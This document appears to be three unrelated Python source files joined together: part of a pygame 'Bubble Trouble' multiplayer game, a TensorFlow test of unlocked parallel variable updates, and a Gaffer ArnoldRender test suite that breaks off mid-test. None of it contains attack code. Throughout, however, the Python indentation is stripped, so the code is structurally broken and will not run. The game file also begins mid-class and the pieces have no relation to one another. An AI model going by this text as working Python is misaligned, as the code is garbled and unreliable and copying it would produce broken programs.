playerImg_2 = pygame.transform.scale(pygame.image.load('Images/player2.png'), (BubbleGameConstants.player_image_width, BubbleGameConstants.player_image_height))
arrowImg = pygame.image.load('Images/arrow.png')
#####Ball levels
size_lvl_8 = 135
size_lvl_7 = 95
size_lvl_6 = 70
size_lvl_5 = 55
size_lvl_4 = 40
size_lvl_3 = 27
size_lvl_2 = 18
size_lvl_1 = 10
ball_sizes = [size_lvl_1, size_lvl_2, size_lvl_3, size_lvl_4, size_lvl_5, size_lvl_6, size_lvl_7, size_lvl_8]
high_lvl_8 = 350
high_lvl_7 = 270
high_lvl_6 = 220
high_lvl_5 = 180
high_lvl_4 = 150
high_lvl_3 = 125
high_lvl_2 = 100
high_lvl_1 = 80
high_hit_lvl = 50
ball_highs = [high_lvl_1, high_lvl_2, high_lvl_3, high_lvl_4, high_lvl_5, high_lvl_6, high_lvl_7, high_lvl_8]
#####Players
player_self = None
player_other = None
playerID = -1
send_coordinates = BubbleGameConstants.player_update_per_frames
game_initted = False
def __init__(self, gamedisp, win_height, win_width):
self.gameDisplay = gamedisp
self.window_height = win_height
self.window_width = win_width
self.window_border_left = 0
self.window_border_right = self.window_width
self.window_border_up = 0
self.window_border_down = self.window_height
def balls(self, x, y, color, ball_lvl):
index = ball_lvl - 1
if('red' == color):
self.gameDisplay.blit(pygame.transform.scale(self.ballImg_red, (self.ball_sizes[index], self.ball_sizes[index])), (x,y-self.ball_sizes[index]))
elif('orange' == color):
self.gameDisplay.blit(pygame.transform.scale(self.ballImg_orange, (self.ball_sizes[index], self.ball_sizes[index])), (x,y-self.ball_sizes[index]))
elif('yellow' == color):
self.gameDisplay.blit(pygame.transform.scale(self.ballImg_yellow, (self.ball_sizes[index], self.ball_sizes[index])), (x,y-self.ball_sizes[index]))
elif('green' == color):
self.gameDisplay.blit(pygame.transform.scale(self.ballImg_green, (self.ball_sizes[index], self.ball_sizes[index])), (x,y-self.ball_sizes[index]))
def add_ball(self, x, y, color, ball_level, direction, ball_step, ball_id):
ball_high = self.window_border_down - y
ball_node = []
ball_node.insert(0, x)
ball_node.insert(1, y)
ball_node.insert(2, color)
ball_node.insert(3, ball_level)
ball_node.insert(4, direction)
ball_node.insert(5, ball_high)
        ball_node.insert(6, ball_step)  # indicates where along the sine arc the ball currently is
ball_node.insert(7, ball_id)
self.ball_array.append(ball_node)
def decrease_opponent_life(self):
self.player_other.decrease_life()
def draw_all_balls(self):
if self.ball_array:
for ball_node in self.ball_array:
self.balls(ball_node[0], ball_node[1], ball_node[2], ball_node[3])
def move_balls(self):
if self.ball_array:
for ball_node in self.ball_array:
#update x
ballx = ball_node[0]
ball_direction = ball_node[4]
if ('right' == ball_direction):
ballx = ballx + BubbleGameConstants.ball_speed_pixels
if ballx > self.window_border_right:
dif = ballx - self.window_border_right
ballx = self.window_border_right - dif
ball_node[4] = 'left'
ball_node[0] = ballx
else:
ballx = ballx - BubbleGameConstants.ball_speed_pixels
if ballx < self.window_border_left:
dif = self.window_border_left - ballx
ballx = self.window_border_left + dif
ball_node[4] = 'right'
ball_node[0] = ballx
#update y
index = ball_node[3] - 1 #ball_lvl
bally = ball_node[1]
ball_step = ball_node[6]
ball_high = ball_node[5]
ball_step = ball_step + 1
if ball_step > self.pi_steps:
ball_step = 0
ball_high = self.ball_highs[index]
high_val = ball_high * math.sin(ball_step * self.one_step_size)
bally = self.window_border_down - high_val
ball_node[1] = bally
ball_node[5] = ball_high
ball_node[6] = ball_step
def check_ball_crash(self, playerx, playery, ball_size, centerx, centery):
r = ball_size / 2
if (centery + r) < (playery-BubbleGameConstants.player_image_height):
return False
if (centerx + r) < playerx:
return False
if (centerx - r) > (playerx + BubbleGameConstants.player_image_width):
return False
if centery < (playery-BubbleGameConstants.player_image_height):
locy = (playery-BubbleGameConstants.player_image_height) - centery
x_range = (r * r) - (locy * locy)
if x_range < 0:
                # should never be reached
return False
x_range = math.sqrt(x_range)
else:
x_range = r
if (centerx + x_range) < (playerx + BubbleGameConstants.player_image_width) and (centerx + x_range) > playerx:
return True
if (centerx - x_range) < (playerx + BubbleGameConstants.player_image_width) and (centerx - x_range) > playerx:
return True
def check_if_player_crash(self, playerx, playery):
if self.ball_array:
for ball_node in self.ball_array:
ballx = ball_node[0]
bally = ball_node[1]
index = ball_node[3] - 1 #ball_lvl
size = self.ball_sizes[index]
# Ball location
centerx = ballx + size / 2
centery = bally - size / 2
#player location
if self.check_ball_crash(playerx, playery, size, centerx, centery):
return True
        # No ball has collided with the player
return False
def split_the_ball(self, ball_node, left_id, right_id):
self.ball_array.remove(ball_node)
ball_lvl = ball_node[3]
if (ball_lvl > 1):
ball1 = []
ball2 = []
ball_lvl = ball_lvl - 1
ballx = ball_node[0]
bally = ball_node[1] - BubbleGameConstants.hit_jump_pixels
color = ball_node[2]
self.add_ball(ballx, bally, color, ball_lvl, 'right', self.top_step, right_id)
self.add_ball(ballx, bally, color, ball_lvl, 'left', self.top_step, left_id)
#FIXME: response func
def find_and_split_ball(self, removeid, leftid, rightid):
if self.ball_array:
for ball_node in self.ball_array:
if removeid == ball_node[7]:
self.split_the_ball(ball_node, leftid, rightid)
def player_hit_the_ball(self, ball_node):
msg = cn.hitBallPacket(self.playerID, ball_node[7])
cn.send_udp_packet(msg, cn.udpSocket())
def check_if_player_hit_ball(self, hookx, hooky):
if self.ball_array:
for ball_node in self.ball_array:
ballx = ball_node[0]
bally = ball_node[1]
index = ball_node[3] - 1 #ball_lvl
size = self.ball_sizes[index]
# Ball location
centerx = ballx + size / 2
centery = bally - size / 2
r = size / 2
if centery < hooky:
locy = hooky - centery
x_range = (r * r) - (locy* locy)
if x_range < 0:
x_range = 0
x_range = math.sqrt(x_range)
else:
x_range = r
if x_range > 0 and hookx > (centerx - r) and hookx < (centerx + r):
print("centerx: "+str(centerx)+" centery: "+str(centery)+" r: "+str(r)+" x_range: "+str(x_range)+ " hookx: "+str(hookx)+" hooky: "+str(hooky))
self.player_hit_the_ball(ball_node)
return True
return False
def check_and_send_coordinates(self):
self.send_coordinates = self.send_coordinates - 1
if self.send_coordinates <= 0:
self.player_self.send_player_coordinates()
self.send_coordinates = BubbleGameConstants.player_update_per_frames
#FIXME response
def init_bubble_game(self, r_lives, balls, x, rivalx, wait):
y = (self.window_height)
self.playerID = getPlayerID()
self.player_self = BubblePlayer(self.gameDisplay, x, y, self.playerImg_1, self.window_border_left, self.window_border_right, self.arrowImg, self.playerID)
self.player_other = BubblePlayer(self.gameDisplay, rivalx, y, self.playerImg_2, self.window_border_left, self.window_border_right, self.arrowImg, -1)
if balls:
for ball_js in balls:
                content = json.loads(ball_js)
x = content['x']
y = content['y']
ball_level = content['size']
color_num = content['clr']
color = self.ball_colors[color_num]
ball_id = content['ballid']
direction = content['direction']
self.add_ball(x, y, color, ball_level, direction, self.top_step, ball_id)
#FIXME wait:
self.game_initted = True
#FIXME response
def update_opponent_info(self, x, movement, shooting_msg, shield_msg):
        self.player_other.update_player_info(x, movement, shooting_msg, shield_msg)
def game_loop(self):
while not self.game_initted:
            time.sleep(0.1)  # waiting for the game to be initialized
x = (self.window_width * 0.45)
y = (self.window_height)
x_change = 0
gameExit = False
while not gameExit:
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
quit()
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_LEFT:
x_change = -BubbleGameConstants.player_speed_pixels
self.player_self.player_move = BubbleGameConstants.player_moving_left
if event.key == pygame.K_RIGHT:
x_change = BubbleGameConstants.player_speed_pixels
self.player_self.player_move = BubbleGameConstants.player_moving_right
if event.key == pygame.K_UP:
if not self.player_self.is_shooting:
self.player_self.shoot(x)
if event.type == pygame.KEYUP:
if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:
x_change = 0
self.player_self.player_move = BubbleGameConstants.player_stable
self.move_balls()
x = self.player_self.calculate_and_change_x(x, x_change)
self.player_self.player_x = x
is_crashed = self.check_if_player_crash(self.player_self.player_x, self.player_self.player_y)
if is_crashed:
self.player_self.player_crashed()
self.player_other.move_player_auto()
self.gameDisplay.fill(self.white)
self.player_self.draw_player()
self.player_other.draw_player()
if self.player_self.is_shooting:
can_hit = self.check_if_player_hit_ball(self.player_self.arrow_x, self.player_self.arrow_y - self.player_self.arrow_size)
if can_hit:
self.player_self.arrow_hit()
self.draw_all_balls()
pygame.display.update()
self.check_and_send_coordinates()
self.clock.tick(60)
################################################################################
# #
################################################################################
def draw_window():
surface.blit(background, (0, 0))
if player1.lives > 0:
surface.blit(player1.projectile.image, (player1.projectile.x, player1.projectile.y))
surface.blit(player1.image, (player1.x, player1.y))
#also show player2
utility.move_ball(player1.projectile, player2.projectile)
if len(utility.balls) == 0:
print('no balls left.')
player1.hb = (player1.x, player1.y, 23, 37)
player2.hb = (player2.x, player2.y, 23, 37)
for ball in utility.balls:
ball.hb = (ball.x, ball.y, 80, 80)
pygame.display.update()
def levelStart(rivallives, balls, noOfBalls, initialX, r_initialX, wait):
bgame.init_bubble_game(rivallives, balls, initialX, r_initialX, wait)
def matchFound(name, w):
global rivalUsername, withId, match
rivalUsername = name
withId = w
match = True
print('Match!', match)
def forceEnd():
pass
def hitball(remove, left, right):
bgame.find_and_split_ball(remove, left, right)
def setPlayerId(i):
global playerId
playerId = i
def rivalDied():
bgame.decrease_opponent_life()
def updateplayer2(x, dir, shield, shoot):
bgame.update_opponent_info(x, dir, shield, shoot)
def wait_for_match():
Thread(target=cn.listenByTcp, daemon=True).start()
Thread(target=cn.listenByUdp, daemon=True).start()
global surface, match
pleaseWaitDir = 1
pleaseWaitX = 10
pleaseWaitY = 40
counter = 0
font = pygame.font.SysFont('timesnewromanbold',35)
textColor1 = (255, 0, 95)
textColor2 = (10, 10, 10)
img = pygame.image.load('please_wait.jpg')
img = pygame.transform.scale(img, (400,300))
t = font.render('Please wait...', True, (30,30,25))
while not match:
clock.tick(32)
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
surface.fill((255,195,47))
if counter % 90 <= 45:
text = font.render('Looking for a match!', True, textColor1)
else:
text = font.render('Looking for a match!', True, textColor2)
if pleaseWaitDir == 1:
pleaseWaitX += 0.70
else:
pleaseWaitX -= 0.70
if pleaseWaitX >= 600 or pleaseWaitX <= 10:
pleaseWaitDir *= -1
surface.blit(text, (250, 200))
surface.blit(img, (200, 250))
surface.blit(t, (pleaseWaitX, pleaseWaitY))
counter += 1
pygame.display.update()
global bgame
    bgame = BubbleGame(surface, 600, 800)  # height/width of the 800x600 display surface created above
bgame.game_loop()
def textInputDidChange(value: str) -> None:
global username
username = value
menu = pygame_menu.Menu(height=600,
width=800,
theme=pygame_menu.themes.THEME_ORANGE,
title='Bubble Trouble')
menu.add_text_input('Name: ', onchange=textInputDidChange)
menu.add_button('Start', wait_for_match)
menu.add_button('Quit', pygame_menu.events.EXIT)
menu.add_image('bt.png', scale=(0.7, 0.7), scale_smooth=True)
if __name__ == '__main__':
menu.mainloop(surface)
|
dense_update_ops_no_tsan_test.py
|
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for state updating ops that may have benign race conditions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.python.platform
import numpy as np
import tensorflow as tf
class AssignOpTest(tf.test.TestCase):
  # NOTE(mrry): We exclude these tests from the TSAN TAP target, because they
# contain benign and deliberate data races when multiple threads update
# the same parameters without a lock.
def testParallelUpdateWithoutLocking(self):
with self.test_session() as sess:
ones_t = tf.fill([1024, 1024], 1.0)
p = tf.Variable(tf.zeros([1024, 1024]))
adds = [tf.assign_add(p, ones_t, use_locking=False)
for _ in range(20)]
tf.initialize_all_variables().run()
def run_add(add_op):
sess.run(add_op)
threads = [self.checkedThread(target=run_add, args=(add_op,))
for add_op in adds]
for t in threads:
t.start()
for t in threads:
t.join()
vals = p.eval()
ones = np.ones((1024, 1024)).astype(np.float32)
self.assertTrue((vals >= ones).all())
self.assertTrue((vals <= ones * 20).all())
def testParallelAssignWithoutLocking(self):
with self.test_session() as sess:
ones_t = tf.fill([1024, 1024], float(1))
p = tf.Variable(tf.zeros([1024, 1024]))
assigns = [tf.assign(p, tf.mul(ones_t, float(i)), False)
for i in range(1, 21)]
tf.initialize_all_variables().run()
def run_assign(assign_op):
sess.run(assign_op)
threads = [self.checkedThread(target=run_assign, args=(assign_op,))
for assign_op in assigns]
for t in threads:
t.start()
for t in threads:
t.join()
vals = p.eval()
# Assert every element is taken from one of the assignments.
self.assertTrue((vals > 0).all())
self.assertTrue((vals <= 20).all())
if __name__ == "__main__":
tf.test.main()
|
ArnoldRenderTest.py
|
##########################################################################
#
# Copyright (c) 2012, John Haddon. All rights reserved.
# Copyright (c) 2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import os
import inspect
import unittest
import subprocess32 as subprocess
import threading
import arnold
import imath
import IECore
import IECoreScene
import IECoreArnold
import Gaffer
import GafferTest
import GafferDispatch
import GafferImage
import GafferScene
import GafferSceneTest
import GafferArnold
import GafferArnoldTest
class ArnoldRenderTest( GafferSceneTest.SceneTestCase ) :
def setUp( self ) :
GafferSceneTest.SceneTestCase.setUp( self )
self.__scriptFileName = self.temporaryDirectory() + "/test.gfr"
def tearDown( self ) :
GafferSceneTest.SceneTestCase.tearDown( self )
GafferScene.deregisterAdaptor( "Test" )
def testExecute( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["render"] = GafferArnold.ArnoldRender()
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["in"].setInput( s["plane"]["out"] )
s["expression"] = Gaffer.Expression()
s["expression"].setExpression( "parent['render']['fileName'] = '" + self.temporaryDirectory() + "/test.%d.ass' % int( context['frame'] )" )
s["fileName"].setValue( self.__scriptFileName )
s.save()
p = subprocess.Popen(
"gaffer execute " + self.__scriptFileName + " -frames 1-3",
shell=True,
stderr = subprocess.PIPE,
)
p.wait()
self.failIf( p.returncode )
for i in range( 1, 4 ) :
self.failUnless( os.path.exists( self.temporaryDirectory() + "/test.%d.ass" % i ) )
def testWaitForImage( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["outputs"] = GafferScene.Outputs()
s["outputs"].addOutput(
"beauty",
IECoreScene.Output(
self.temporaryDirectory() + "/test.tif",
"tiff",
"rgba",
{}
)
)
s["outputs"]["in"].setInput( s["plane"]["out"] )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["outputs"]["out"] )
s["render"]["task"].execute()
self.failUnless( os.path.exists( self.temporaryDirectory() + "/test.tif" ) )
def testExecuteWithStringSubstitutions( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["render"] = GafferArnold.ArnoldRender()
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["in"].setInput( s["plane"]["out"] )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.####.ass" )
s["fileName"].setValue( self.__scriptFileName )
s.save()
p = subprocess.Popen(
"gaffer execute " + self.__scriptFileName + " -frames 1-3",
shell=True,
stderr = subprocess.PIPE,
)
p.wait()
self.failIf( p.returncode )
for i in range( 1, 4 ) :
self.failUnless( os.path.exists( self.temporaryDirectory() + "/test.%04d.ass" % i ) )
def testImageOutput( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["outputs"] = GafferScene.Outputs()
s["outputs"].addOutput(
"beauty",
IECoreScene.Output(
self.temporaryDirectory() + "/test.####.tif",
"tiff",
"rgba",
{}
)
)
s["outputs"]["in"].setInput( s["plane"]["out"] )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["outputs"]["out"] )
c = Gaffer.Context()
for i in range( 1, 4 ) :
c.setFrame( i )
with c :
s["render"]["task"].execute()
for i in range( 1, 4 ) :
self.failUnless( os.path.exists( self.temporaryDirectory() + "/test.%04d.tif" % i ) )
def testTypeNamePrefixes( self ) :
self.assertTypeNamesArePrefixed( GafferArnold )
self.assertTypeNamesArePrefixed( GafferArnoldTest )
def testDefaultNames( self ) :
self.assertDefaultNamesAreCorrect( GafferArnold )
self.assertDefaultNamesAreCorrect( GafferArnoldTest )
def testNodesConstructWithDefaultValues( self ) :
self.assertNodesConstructWithDefaultValues( GafferArnold )
self.assertNodesConstructWithDefaultValues( GafferArnoldTest )
def testDirectoryCreation( self ) :
s = Gaffer.ScriptNode()
s["variables"].addMember( "renderDirectory", self.temporaryDirectory() + "/renderTests" )
s["variables"].addMember( "assDirectory", self.temporaryDirectory() + "/assTests" )
s["plane"] = GafferScene.Plane()
s["outputs"] = GafferScene.Outputs()
s["outputs"]["in"].setInput( s["plane"]["out"] )
s["outputs"].addOutput(
"beauty",
IECoreScene.Output(
"$renderDirectory/test.####.exr",
"exr",
"rgba",
{}
)
)
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["outputs"]["out"] )
s["render"]["fileName"].setValue( "$assDirectory/test.####.ass" )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
self.assertFalse( os.path.exists( self.temporaryDirectory() + "/renderTests" ) )
self.assertFalse( os.path.exists( self.temporaryDirectory() + "/assTests" ) )
self.assertFalse( os.path.exists( self.temporaryDirectory() + "/assTests/test.0001.ass" ) )
s["fileName"].setValue( self.temporaryDirectory() + "/test.gfr" )
with s.context() :
s["render"]["task"].execute()
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/renderTests" ) )
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/assTests" ) )
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/assTests/test.0001.ass" ) )
# check it can cope with everything already existing
with s.context() :
s["render"]["task"].execute()
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/renderTests" ) )
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/assTests" ) )
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/assTests/test.0001.ass" ) )
def testWedge( self ) :
s = Gaffer.ScriptNode()
s["sphere"] = GafferScene.Sphere()
s["sphere"]["sets"].setValue( "${wedge:value}" )
s["filter"] = GafferScene.SetFilter()
s["filter"]["setExpression"].setValue( "hidden" )
s["attributes"] = GafferScene.StandardAttributes()
s["attributes"]["attributes"]["visibility"]["enabled"].setValue( True )
s["attributes"]["attributes"]["visibility"]["value"].setValue( False )
s["attributes"]["filter"].setInput( s["filter"]["out"] )
s["attributes"]["in"].setInput( s["sphere"]["out"] )
s["outputs"] = GafferScene.Outputs()
s["outputs"].addOutput(
"beauty",
IECoreScene.Output(
self.temporaryDirectory() + "/${wedge:value}.tif",
"tiff",
"rgba",
{
}
)
)
s["outputs"]["in"].setInput( s["attributes"]["out"] )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.####.ass" )
s["render"]["in"].setInput( s["outputs"]["out"] )
s["wedge"] = Gaffer.Wedge()
s["wedge"]["mode"].setValue( int( s["wedge"].Mode.StringList ) )
s["wedge"]["strings"].setValue( IECore.StringVectorData( [ "visible", "hidden" ] ) )
s["wedge"]["preTasks"][0].setInput( s["render"]["task"] )
s["fileName"].setValue( self.temporaryDirectory() + "/test.gfr" )
s.save()
dispatcher = GafferDispatch.LocalDispatcher()
dispatcher["jobsDirectory"].setValue( self.temporaryDirectory() + "/testJobDirectory" )
dispatcher["framesMode"].setValue( GafferDispatch.Dispatcher.FramesMode.CurrentFrame )
dispatcher["executeInBackground"].setValue( False )
dispatcher.dispatch( [ s["wedge"] ] )
hidden = GafferImage.ImageReader()
hidden["fileName"].setValue( self.temporaryDirectory() + "/hidden.tif" )
visible = GafferImage.ImageReader()
visible["fileName"].setValue( self.temporaryDirectory() + "/visible.tif" )
hiddenStats = GafferImage.ImageStats()
hiddenStats["in"].setInput( hidden["out"] )
hiddenStats["area"].setValue( hiddenStats["in"]["dataWindow"].getValue() )
visibleStats = GafferImage.ImageStats()
visibleStats["in"].setInput( visible["out"] )
visibleStats["area"].setValue( visibleStats["in"]["dataWindow"].getValue() )
self.assertLess( hiddenStats["average"].getValue()[0], 0.05 )
self.assertGreater( visibleStats["average"].getValue()[0], .27 )
@staticmethod
def __m44f( m ) :
return imath.M44f( *[ i for row in m.data for i in row ] )
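	# __m44f() flattens the 4x4 .data rows of an Arnold AtMatrix into an
	# imath.M44f so matrices read back from the generated .ass file can be
	# compared with assertEqual() in the motion-blur tests below.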
def testTransformMotion( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["sphere"] = GafferScene.Sphere()
s["group"] = GafferScene.Group()
s["group"]["in"][0].setInput( s["plane"]["out"] )
s["group"]["in"][1].setInput( s["sphere"]["out"] )
s["expression"] = Gaffer.Expression()
s["expression"].setExpression(
inspect.cleandoc(
"""
parent["plane"]["transform"]["translate"]["x"] = context.getFrame()
parent["sphere"]["transform"]["translate"]["y"] = context.getFrame() * 2
parent["group"]["transform"]["translate"]["z"] = context.getFrame() - 1
"""
)
)
s["planeFilter"] = GafferScene.PathFilter()
s["planeFilter"]["paths"].setValue( IECore.StringVectorData( [ "/group/plane" ] ) )
s["attributes"] = GafferScene.StandardAttributes()
s["attributes"]["in"].setInput( s["group"]["out"] )
s["attributes"]["filter"].setInput( s["planeFilter"]["out"] )
s["attributes"]["attributes"]["transformBlur"]["enabled"].setValue( True )
s["attributes"]["attributes"]["transformBlur"]["value"].setValue( False )
s["options"] = GafferScene.StandardOptions()
s["options"]["in"].setInput( s["attributes"]["out"] )
s["options"]["options"]["shutter"]["enabled"].setValue( True )
s["options"]["options"]["transformBlur"]["enabled"].setValue( True )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["options"]["out"] )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
# No motion blur
s["options"]["options"]["transformBlur"]["value"].setValue( False )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
camera = arnold.AiNodeLookUpByName( "gaffer:defaultCamera" )
sphere = arnold.AiNodeLookUpByName( "/group/sphere" )
sphereMotionStart = arnold.AiNodeGetFlt( sphere, "motion_start" )
sphereMotionEnd = arnold.AiNodeGetFlt( sphere, "motion_end" )
sphereMatrix = arnold.AiNodeGetMatrix( sphere, "matrix" )
plane = arnold.AiNodeLookUpByName( "/group/plane" )
planeMotionStart = arnold.AiNodeGetFlt( plane, "motion_start" )
planeMotionEnd = arnold.AiNodeGetFlt( plane, "motion_end" )
planeMatrix = arnold.AiNodeGetMatrix( plane, "matrix" )
# Motion parameters should be left at default
self.assertEqual( sphereMotionStart, 0 )
self.assertEqual( sphereMotionEnd, 1 )
self.assertEqual( planeMotionStart, 0 )
self.assertEqual( planeMotionEnd, 1 )
expectedSphereMatrix = arnold.AiM4Translation( arnold.AtVector( 0, 2, 0 ) )
expectedPlaneMatrix = arnold.AiM4Translation( arnold.AtVector( 1, 0, 0 ) )
self.assertEqual( self.__m44f( sphereMatrix ), self.__m44f( expectedSphereMatrix ) )
self.assertEqual( self.__m44f( planeMatrix ), self.__m44f( expectedPlaneMatrix ) )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_start" ), 1 )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_end" ), 1 )
# Motion blur
s["options"]["options"]["transformBlur"]["value"].setValue( True )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
camera = arnold.AiNodeLookUpByName( "gaffer:defaultCamera" )
sphere = arnold.AiNodeLookUpByName( "/group/sphere" )
sphereMotionStart = arnold.AiNodeGetFlt( sphere, "motion_start" )
sphereMotionEnd = arnold.AiNodeGetFlt( sphere, "motion_end" )
sphereMatrices = arnold.AiNodeGetArray( sphere, "matrix" )
plane = arnold.AiNodeLookUpByName( "/group/plane" )
planeMotionStart = arnold.AiNodeGetFlt( plane, "motion_start" )
planeMotionEnd = arnold.AiNodeGetFlt( plane, "motion_end" )
planeMatrices = arnold.AiNodeGetArray( plane, "matrix" )
self.assertEqual( sphereMotionStart, 0.75 )
self.assertEqual( sphereMotionEnd, 1.25 )
self.assertEqual( arnold.AiArrayGetNumElements( sphereMatrices.contents ), 1 )
self.assertEqual( arnold.AiArrayGetNumKeys( sphereMatrices.contents ), 2 )
self.assertEqual( planeMotionStart, 0.75 )
self.assertEqual( planeMotionEnd, 1.25 )
self.assertEqual( arnold.AiArrayGetNumElements( planeMatrices.contents ), 1 )
self.assertEqual( arnold.AiArrayGetNumKeys( planeMatrices.contents ), 2 )
for i in range( 0, 2 ) :
frame = 0.75 + 0.5 * i
sphereMatrix = arnold.AiArrayGetMtx( sphereMatrices, i )
expectedSphereMatrix = arnold.AiM4Translation( arnold.AtVector( 0, frame * 2, frame - 1 ) )
planeMatrix = arnold.AiArrayGetMtx( planeMatrices, i )
expectedPlaneMatrix = arnold.AiM4Translation( arnold.AtVector( 1, 0, frame - 1 ) )
self.assertEqual( self.__m44f( sphereMatrix ), self.__m44f( expectedSphereMatrix ) )
self.assertEqual( self.__m44f( planeMatrix ), self.__m44f( expectedPlaneMatrix ) )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_start" ), 0.75 )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_end" ), 1.25 )
# Motion blur on, but sampleMotion off
s["options"]["options"]["sampleMotion"]["enabled"].setValue( True )
s["options"]["options"]["sampleMotion"]["value"].setValue( False )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
camera = arnold.AiNodeLookUpByName( "gaffer:defaultCamera" )
sphere = arnold.AiNodeLookUpByName( "/group/sphere" )
sphereMotionStart = arnold.AiNodeGetFlt( sphere, "motion_start" )
sphereMotionEnd = arnold.AiNodeGetFlt( sphere, "motion_end" )
sphereMatrices = arnold.AiNodeGetArray( sphere, "matrix" )
plane = arnold.AiNodeLookUpByName( "/group/plane" )
planeMotionStart = arnold.AiNodeGetFlt( plane, "motion_start" )
planeMotionEnd = arnold.AiNodeGetFlt( plane, "motion_end" )
planeMatrices = arnold.AiNodeGetArray( plane, "matrix" )
self.assertEqual( sphereMotionStart, 0.75 )
self.assertEqual( sphereMotionEnd, 1.25 )
self.assertEqual( arnold.AiArrayGetNumElements( sphereMatrices.contents ), 1 )
self.assertEqual( arnold.AiArrayGetNumKeys( sphereMatrices.contents ), 2 )
self.assertEqual( planeMotionStart, 0.75 )
self.assertEqual( planeMotionEnd, 1.25 )
self.assertEqual( arnold.AiArrayGetNumElements( planeMatrices.contents ), 1 )
self.assertEqual( arnold.AiArrayGetNumKeys( planeMatrices.contents ), 2 )
for i in range( 0, 2 ) :
frame = 0.75 + 0.5 * i
sphereMatrix = arnold.AiArrayGetMtx( sphereMatrices, i )
expectedSphereMatrix = arnold.AiM4Translation( arnold.AtVector( 0, frame * 2, frame - 1 ) )
planeMatrix = arnold.AiArrayGetMtx( planeMatrices, i )
expectedPlaneMatrix = arnold.AiM4Translation( arnold.AtVector( 1, 0, frame - 1 ) )
self.assertEqual( self.__m44f( sphereMatrix ), self.__m44f( expectedSphereMatrix ) )
self.assertEqual( self.__m44f( planeMatrix ), self.__m44f( expectedPlaneMatrix ) )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_start" ), 0.75 )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_end" ), 0.75 )
def testResolution( self ) :
s = Gaffer.ScriptNode()
s["camera"] = GafferScene.Camera()
s["options"] = GafferScene.StandardOptions()
s["options"]["in"].setInput( s["camera"]["out"] )
s["options"]["options"]["renderResolution"]["enabled"].setValue( True )
s["options"]["options"]["renderResolution"]["value"].setValue( imath.V2i( 200, 100 ) )
